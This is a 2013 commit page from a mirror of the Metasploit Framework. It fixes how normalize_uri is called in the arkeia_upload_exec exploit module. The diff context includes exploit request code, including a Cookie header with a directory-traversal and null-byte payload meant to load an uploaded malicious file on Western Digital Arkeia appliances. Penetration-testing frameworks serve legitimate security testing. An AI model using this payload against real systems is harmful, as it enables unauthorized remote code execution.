infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix use of normalize_uri

bug/bundler_fix
jvazquez-r7 2013-09-19 12:59:37 -05:00
parent b4fa535f2b
commit 6073e6f2dc
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/exploits/unix/webapp/arkeia_upload_exec.rb
View File

@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(uri, "") 'uri' => normalize_uri(uri)
}) })
if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/ if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'headers' => { 'Cookie' => "lang=fr" }, 'headers' => { 'Cookie' => "lang=fr" },
'uri' => normalize_uri(uri, "") 'uri' => normalize_uri(uri)
}) })
if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/ if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/
@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" }, 'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },
'uri' => normalize_uri(uri, "") 'uri' => normalize_uri(uri)
}) })
# If we don't get a 200 when we request our malicious payload, we suspect # If we don't get a 200 when we request our malicious payload, we suspect